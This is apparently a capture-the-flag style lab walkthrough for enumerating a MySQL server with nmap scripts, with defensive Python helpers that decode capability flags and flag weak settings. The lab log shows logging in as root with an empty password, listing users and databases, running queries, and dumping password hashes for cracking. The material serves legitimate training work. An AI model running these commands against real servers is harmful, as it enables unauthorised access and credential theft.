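def parse_capabilities_flags(nmap_output: str) -> int:
    """Extract the numeric 'Capabilities flags' value from a mysql-info block."""
    match = re.search(r"Capabilities flags:\s*(\d+)", nmap_output)
    if match is None:
        raise ValueError("no 'Capabilities flags' line in the supplied output")
    return int(match.group(1))


def decode_capabilities(flags: int) -> list:
    """Return the names of the capability bits set in the lower 16 bits of flags.

    Bits above 16 (the extended flags such as SupportsAuthPlugins) are not part
    of the number mysql-info prints, so they are only counted here, not named.
    """
    names = [name for bit, name in CAPABILITIES.items() if flags & bit]
    if flags >> 16:
        names.append("ExtendedFlags(0x%x)" % (flags >> 16))
    return names


def supports(flags: int, capability: str) -> bool:
    """True when the named capability bit is set, e.g. 'InteractiveClient'."""
    return capability in decode_capabilities(flags)


def security_notes(flags: int) -> list:
    """What a defender learns from the unauthenticated handshake alone."""
    notes = []
    if not supports(flags, "SwitchToSSLAfterHandshake"):
        notes.append("no TLS offered: credentials and query traffic cross the wire in clear text")
    if supports(flags, "SupportsLoadDataLocal"):
        notes.append("LOAD DATA LOCAL accepted: clients should connect with local infile disabled")
    if not supports(flags, "Support41Auth"):
        notes.append("4.1 secure authentication not supported: weak pre-4.1 password hashing only")
    return notes


if __name__ == "__main__":
    flags = parse_capabilities_flags(SAMPLE_MYSQL_INFO)
    print("flags = %d (0x%04x)" % (flags, flags))
    for name in decode_capabilities(flags):
        print("  +", name)
    print("InteractiveClient supported:", supports(flags, "InteractiveClient"))
    for note in security_notes(flags):
        print("  !", note)
```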
Enumerate the users present on the MySQL database server using the mysql-users nmap script.
filetest, root, debian-sys-maint, guest, sigver, sysadmin, udadmin, ultra
Attempts to list all users on a MySQL server.
root@attackdefense:~# nmap -sV --script=mysql-users --script-args="mysqluser='root',mysqlpass=''" 192.41.63.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 03:24 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.000027s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.5.62-0ubuntu0.14.04.1
| mysql-users:
| filetest
| root
| debian-sys-maint
| guest
| sigver
| sysadmin
| udadmin
|_ ultra
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.49 seconds
List all databases stored on the MySQL server using an nmap script.
Attempts to list all databases on a MySQL server.
root@attackdefense:~# nmap -sV --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''" 192.41.63.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 03:28 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.5.62-0ubuntu0.14.04.1
| mysql-databases:
| information_schema
| books
| data
| mysql
| password
| performance_schema
| secret
| store
| upload
| vendors
|_ videos
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds
Find the data directory used by the MySQL server using an nmap script.
datadir: /var/lib/mysql/
Attempts to show all variables on a MySQL server.
root@attackdefense:~# nmap -sV --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''" 192.41.63.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 03:31 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.0000090s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
3306/tcp open mysql MySQL 5.5.62-0ubuntu0.14.04.1
| mysql-variables:
| auto_increment_increment: 1
| auto_increment_offset: 1
| autocommit: ON
| automatic_sp_privileges: ON
| back_log: 50
| basedir: /usr
| big_tables: OFF
| binlog_cache_size: 32768
| binlog_direct_non_transactional_updates: OFF
| binlog_format: STATEMENT
| binlog_stmt_cache_size: 32768
| bulk_insert_buffer_size: 8388608
| character_set_client: latin1
| character_set_connection: latin1
| character_set_database: latin1
| character_set_filesystem: binary
| character_set_results: latin1
| character_set_server: latin1
| character_set_system: utf8
| character_sets_dir: /usr/share/mysql/charsets/
| collation_connection: latin1_swedish_ci
| collation_database: latin1_swedish_ci
| collation_server: latin1_swedish_ci
| completion_type: NO_CHAIN
| concurrent_insert: AUTO
| connect_timeout: 10
| datadir: /var/lib/mysql/
| date_format: %Y-%m-%d
| datetime_format: %Y-%m-%d %H:%i:%s
| default_storage_engine: InnoDB
| default_week_format: 0
| delay_key_write: ON
| delayed_insert_limit: 100
| delayed_insert_timeout: 300
| delayed_queue_size: 1000
| div_precision_increment: 4
| engine_condition_pushdown: ON
| error_count: 0
| event_scheduler: OFF
| expire_logs_days: 10
| external_user:
| flush: OFF
| flush_time: 0
| foreign_key_checks: ON
| ft_boolean_syntax: + -><()~*:""&|
| ft_max_word_len: 84
| ft_min_word_len: 4
| ft_query_expansion_limit: 20
| ft_stopword_file: (built-in)
| general_log: OFF
| general_log_file: /var/lib/mysql/victim-1.log
| group_concat_max_len: 1024
| have_compress: YES
| have_crypt: YES
| have_csv: YES
| have_dynamic_loading: YES
| have_geometry: YES
| have_innodb: YES
| have_ndbcluster: NO
| have_openssl: DISABLED
| have_partitioning: YES
| have_profiling: YES
| have_query_cache: YES
| have_rtree_keys: YES
| have_ssl: DISABLED
| have_symlink: YES
| hostname: victim-1
| identity: 0
| ignore_builtin_innodb: OFF
| init_connect:
| init_file:
| init_slave:
| innodb_adaptive_flushing: ON
| innodb_adaptive_hash_index: ON
| innodb_additional_mem_pool_size: 8388608
| innodb_autoextend_increment: 8
| innodb_autoinc_lock_mode: 1
| innodb_buffer_pool_instances: 1
| innodb_buffer_pool_size: 134217728
| innodb_change_buffering: all
| innodb_checksums: ON
| innodb_commit_concurrency: 0
| innodb_concurrency_tickets: 500
| innodb_data_file_path: ibdata1:10M:autoextend
| innodb_data_home_dir:
| innodb_doublewrite: ON
| innodb_fast_shutdown: 1
| innodb_file_format: Antelope
| innodb_file_format_check: ON
| innodb_file_format_max: Antelope
| innodb_file_per_table: OFF
| innodb_flush_log_at_trx_commit: 1
| innodb_flush_method:
| innodb_force_load_corrupted: OFF
| innodb_force_recovery: 0
| innodb_io_capacity: 200
| innodb_large_prefix: OFF
| innodb_lock_wait_timeout: 50
| innodb_locks_unsafe_for_binlog: OFF
| innodb_log_buffer_size: 8388608
| innodb_log_file_size: 5242880
| innodb_log_files_in_group: 2
| innodb_log_group_home_dir: ./
| innodb_max_dirty_pages_pct: 75
| innodb_max_purge_lag: 0
| innodb_mirrored_log_groups: 1
| innodb_old_blocks_pct: 37
| innodb_old_blocks_time: 0
| innodb_open_files: 300
| innodb_print_all_deadlocks: OFF
| innodb_purge_batch_size: 20
| innodb_purge_threads: 0
| innodb_random_read_ahead: OFF
| innodb_read_ahead_threshold: 56
| innodb_read_io_threads: 4
| innodb_replication_delay: 0
| innodb_rollback_on_timeout: OFF
| innodb_rollback_segments: 128
| innodb_spin_wait_delay: 6
| innodb_stats_method: nulls_equal
| innodb_stats_on_metadata: ON
| innodb_stats_sample_pages: 8
| innodb_strict_mode: OFF
| innodb_support_xa: ON
| innodb_sync_spin_loops: 30
| innodb_table_locks: ON
| innodb_thread_concurrency: 0
| innodb_thread_sleep_delay: 10000
| innodb_use_native_aio: ON
| innodb_use_sys_malloc: ON
| innodb_version: 5.5.62
| innodb_write_io_threads: 4
| insert_id: 0
| interactive_timeout: 28800
| join_buffer_size: 131072
| keep_files_on_create: OFF
| key_buffer_size: 16777216
| key_cache_age_threshold: 300
| key_cache_block_size: 1024
| key_cache_division_limit: 100
| large_files_support: ON
| large_page_size: 0
| large_pages: OFF
| last_insert_id: 0
| lc_messages: en_US
| lc_messages_dir: /usr/share/mysql/
| lc_time_names: en_US
| license: GPL
| local_infile: ON
| lock_wait_timeout: 31536000
| locked_in_memory: OFF
| log: OFF
| log_bin: OFF
| log_bin_trust_function_creators: OFF
| log_error: /var/log/mysql/error.log
| log_output: FILE
| log_queries_not_using_indexes: OFF
| log_slave_updates: OFF
| log_slow_queries: OFF
| log_warnings: 1
| long_query_time: 10.000000
| low_priority_updates: OFF
| lower_case_file_system: OFF
| lower_case_table_names: 0
| max_allowed_packet: 16777216
| max_binlog_cache_size: 18446744073709547520
| max_binlog_size: 104857600
| max_binlog_stmt_cache_size: 18446744073709547520
| max_connect_errors: 10
| max_connections: 151
| max_delayed_threads: 20
| max_error_count: 64
| max_heap_table_size: 16777216
| max_insert_delayed_threads: 20
| max_join_size: 18446744073709551615
| max_length_for_sort_data: 1024
| max_long_data_size: 16777216
| max_prepared_stmt_count: 16382
| max_relay_log_size: 0
| max_seeks_for_key: 18446744073709551615
| max_sort_length: 1024
| max_sp_recursion_depth: 0
| max_tmp_tables: 32
| max_user_connections: 0
| max_write_lock_count: 18446744073709551615
| metadata_locks_cache_size: 1024
| min_examined_row_limit: 0
| multi_range_count: 256
| myisam_data_pointer_size: 6
| myisam_max_sort_file_size: 9223372036853727232
| myisam_mmap_size: 18446744073709551615
| myisam_recover_options: BACKUP
| myisam_repair_threads: 1
| myisam_sort_buffer_size: 8388608
| myisam_stats_method: nulls_unequal
| myisam_use_mmap: OFF
| net_buffer_length: 16384
| net_read_timeout: 30
| net_retry_count: 10
| net_write_timeout: 60
| new: OFF
| old: OFF
| old_alter_table: OFF
| old_passwords: OFF
| open_files_limit: 1048576
| optimizer_prune_level: 1
| optimizer_search_depth: 62
| optimizer_switch: index_merge=on,index_merge_union=on,index_merge_sort_union=on,index_merge_intersection=on,engine_condition_pushdown=on
| performance_schema: OFF
| performance_schema_events_waits_history_long_size: 10000
| performance_schema_events_waits_history_size: 10
| performance_schema_max_cond_classes: 80
| performance_schema_max_cond_instances: 1000
| performance_schema_max_file_classes: 50
| performance_schema_max_file_handles: 32768
| performance_schema_max_file_instances: 10000
| performance_schema_max_mutex_classes: 200
| performance_schema_max_mutex_instances: 1000000
| performance_schema_max_rwlock_classes: 30
| performance_schema_max_rwlock_instances: 1000000
| performance_schema_max_table_handles: 100000
| performance_schema_max_table_instances: 50000
| performance_schema_max_thread_classes: 50
| performance_schema_max_thread_instances: 1000
| pid_file: /var/run/mysqld/mysqld.pid
| plugin_dir: /usr/lib/mysql/plugin/
| port: 3306
| preload_buffer_size: 32768
| profiling: OFF
| profiling_history_size: 15
| protocol_version: 10
| proxy_user:
| pseudo_slave_mode: OFF
| pseudo_thread_id: 60
| query_alloc_block_size: 8192
| query_cache_limit: 1048576
| query_cache_min_res_unit: 4096
| query_cache_size: 16777216
| query_cache_type: ON
| query_cache_wlock_invalidate: OFF
| query_prealloc_size: 8192
| rand_seed1: 0
| rand_seed2: 0
| range_alloc_block_size: 4096
| read_buffer_size: 131072
| read_only: OFF
| read_rnd_buffer_size: 262144
| relay_log:
| relay_log_index:
| relay_log_info_file: relay-log.info
| relay_log_purge: ON
| relay_log_recovery: OFF
| relay_log_space_limit: 0
| report_host:
| report_password:
| report_port: 3306
| report_user:
| rpl_recovery_rank: 0
| secure_auth: OFF
| secure_file_priv:
| server_id: 0
| skip_external_locking: ON
| skip_name_resolve: OFF
| skip_networking: OFF
| skip_show_database: OFF
| slave_compressed_protocol: OFF
| slave_exec_mode: STRICT
| slave_load_tmpdir: /tmp
| slave_max_allowed_packet: 1073741824
| slave_net_timeout: 3600
| slave_skip_errors: OFF
| slave_transaction_retries: 10
| slave_type_conversions:
| slow_launch_time: 2
| slow_query_log: OFF
| slow_query_log_file: /var/lib/mysql/victim-1-slow.log
| socket: /var/run/mysqld/mysqld.sock
| sort_buffer_size: 2097152
| sql_auto_is_null: OFF
| sql_big_selects: ON
| sql_big_tables: OFF
| sql_buffer_result: OFF
| sql_log_bin: ON
| sql_log_off: OFF
| sql_low_priority_updates: OFF
| sql_max_join_size: 18446744073709551615
| sql_mode:
| sql_notes: ON
| sql_quote_show_create: ON
| sql_safe_updates: OFF
| sql_select_limit: 18446744073709551615
| sql_slave_skip_counter: 0
| sql_warnings: OFF
| ssl_ca:
| ssl_capath:
| ssl_cert:
| ssl_cipher:
| ssl_key:
| storage_engine: InnoDB
| stored_program_cache: 256
| sync_binlog: 0
| sync_frm: ON
| sync_master_info: 0
| sync_relay_log: 0
| sync_relay_log_info: 0
| system_time_zone: UTC
| table_definition_cache: 400
| table_open_cache: 400
| thread_cache_size: 8
| thread_concurrency: 10
| thread_handling: one-thread-per-connection
| thread_stack: 196608
| time_format: %H:%i:%s
| time_zone: SYSTEM
| timed_mutexes: OFF
| timestamp: 1661484676
| tmp_table_size: 16777216
| tmpdir: /tmp
| transaction_alloc_block_size: 8192
| transaction_prealloc_size: 4096
| tx_isolation: REPEATABLE-READ
| unique_checks: ON
| updatable_views_with_limit: YES
| version: 5.5.62-0ubuntu0.14.04.1
| version_comment: (Ubuntu)
| version_compile_machine: x86_64
| version_compile_os: debian-linux-gnu
| wait_timeout: 28800
|_ warning_count: 0
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.51 seconds
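A defender reading the mysql-variables output above wants the weak settings pulled out of the wall of `| key: value` lines rather than scanned by eye. The following Python is an added example, not part of the original page or of nmap: it parses that report format (including variables printed with an empty value, such as `secure_file_priv:`) and applies a small baseline of checks that is my own assumption, not the CIS audit file's logic.

```python
"""Parse `| key: value` lines of an nmap mysql-variables report and flag weak settings."""
import re

# Constructed sample: a subset of the mysql-variables lines shown in the scan above.
SAMPLE_REPORT = """\
| mysql-variables:
| old_passwords: OFF
| secure_auth: OFF
| secure_file_priv:
| skip_networking: OFF
| skip_show_database: OFF
| sql_mode:
| ssl_cert:
| version: 5.5.62-0ubuntu0.14.04.1
|_ warning_count: 0
"""

# Matches "| name: value" and the last line's "|_ name: value"; value may be empty.
_LINE = re.compile(r"^\|_?\s*([A-Za-z0-9_]+):\s*(.*)$")


def parse_variables(report):
    """Return {name: value}; a variable printed with nothing after the colon maps to ''."""
    variables = {}
    for line in report.splitlines():
        m = _LINE.match(line.strip())
        if m:
            variables[m.group(1)] = m.group(2).strip()
    return variables


# Assumed defender baseline: (variable, predicate that must hold, why it matters).
CHECKS = [
    ("secure_auth", lambda v: v == "ON", "pre-4.1 password hashes are accepted at login"),
    ("skip_show_database", lambda v: v == "ON", "any user can list every database"),
    ("secure_file_priv", lambda v: v != "", "LOAD_FILE/INTO OUTFILE are not confined to a directory"),
    ("ssl_cert", lambda v: v != "", "no server certificate, so client traffic is plaintext"),
    ("sql_mode", lambda v: "NO_AUTO_CREATE_USER" in v, "GRANT can silently create accounts"),
]


def find_weak_settings(variables):
    """Return [(variable, current_value, reason)] for each failed check.
    A variable absent from the report is reported with value 'unknown', not skipped."""
    findings = []
    for name, ok, why in CHECKS:
        value = variables.get(name)
        if value is None or not ok(value):
            findings.append((name, "unknown" if value is None else value, why))
    return findings


if __name__ == "__main__":
    for name, value, why in find_weak_settings(parse_variables(SAMPLE_REPORT)):
        print(f"{name} = {value!r}: {why}")
```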
Check whether FILE privileges can be granted to non-admin users using the mysql-audit nmap script.
No.
Audits the MySQL database server security configuration against parts of the CIS MySQL v1.0.2 benchmark (the engine can be used for other MySQL audits by creating an appropriate audit file).
root@attackdefense:~# nmap -p 3306 --script mysql-audit --script-args "mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'" 192.41.63.3
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 03:38 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.000043s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-audit:
| CIS MySQL Benchmarks v1.0.2
| 3.1: Skip symbolic links => FAIL
| 3.2: Logs not on system partition => PASS
| 3.2: Logs not on database partition => PASS
| 4.1: Supported version of MySQL => REVIEW
| Version: 5.5.62-0ubuntu0.14.04.1
| 4.4: Remove test database => PASS
| 4.5: Change admin account name => PASS
| 4.7: Verify Secure Password Hashes => PASS
| 4.9: Wildcards in user hostname => PASS
| The following users were found with wildcards in hostname
| filetest
| root
| 4.10: No blank passwords => PASS
| The following users were found having blank/empty passwords
| root
| 4.11: Anonymous account => PASS
| 5.1: Access to mysql database => REVIEW
| Verify the following users that have access to the MySQL database
| user host
| 5.2: Do not grant FILE privileges to non Admin users => PASS
| The following users were found having the FILE privilege
| filetest
| 5.3: Do not grant PROCESS privileges to non Admin users => PASS
| 5.4: Do not grant SUPER privileges to non Admin users => PASS
| 5.5: Do not grant SHUTDOWN privileges to non Admin users => PASS
| 5.6: Do not grant CREATE USER privileges to non Admin users => PASS
| 5.7: Do not grant RELOAD privileges to non Admin users => PASS
| 5.8: Do not grant GRANT privileges to non Admin users => PASS
| 6.2: Disable Load data local => FAIL
| 6.3: Disable old password hashing => FAIL
| 6.4: Safe show database => FAIL
| 6.5: Secure auth => FAIL
| 6.6: Grant tables => FAIL
| 6.7: Skip merge => FAIL
| 6.8: Skip networking => FAIL
| 6.9: Safe user create => FAIL
| 6.10: Skip symbolic links => FAIL
|
| Additional information
| The audit was performed using the db-account: root
|_ The following admin accounts were excluded from the audit: root,debian-sys-maint
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
Dump all user hashes using nmap script.
Dumps the password hashes from a MySQL server in a format suitable for cracking by tools such as John the Ripper. Appropriate database privileges (root) are required.
root@attackdefense:~# nmap -p 3306 192.41.63.3 --script mysql-dump-hashes --script-args="username='root',password=''"
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 03:45 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.000049s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-dump-hashes:
| debian-sys-maint:*CDDA79A15EF590ED57BB5933ECD27364809EE90D
| filetest:*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
| ultra:*827EC562775DC9CE458689D36687DCED320F34B0
| guest:*17FD2DDCC01E0E66405FB1BA16F033188D18F646
| sigver:*027ADC92DD1A83351C64ABCD8BD4BA16EEDA0AB0
| udadmin:*E6DEAD2645D88071D28F004A209691AC60A72AC9
|_ sysadmin:*46CFC7938B60837F46B610A2D10C248874555C14
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds
Find the number of records stored in table "authors" in database "books" on the MySQL server using the mysql-query nmap script.
Runs a query against a MySQL database and returns the result as a table.
root@attackdefense:~# nmap -p 3306 192.41.63.3 --script mysql-query --script-args="query='select count(*) from books.authors;',username='root',password=''"
Starting Nmap 7.70 ( https://nmap.org ) at 2022-08-26 03:50 UTC
Nmap scan report for target-1 (192.41.63.3)
Host is up (0.000039s latency).
PORT STATE SERVICE
3306/tcp open mysql
| mysql-query:
| count(*)
| 10
|
| Query: select count(*) from books.authors;
|_ User: root
MAC Address: 02:42:C0:29:3F:03 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
Solution
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-529.pdf
Metasploit Module: MySQL Password Hashdump
MYSQL File/Directory Enumerator
Nmap Script: mysql-empty-password
Nmap Script: mysql-dump-hashes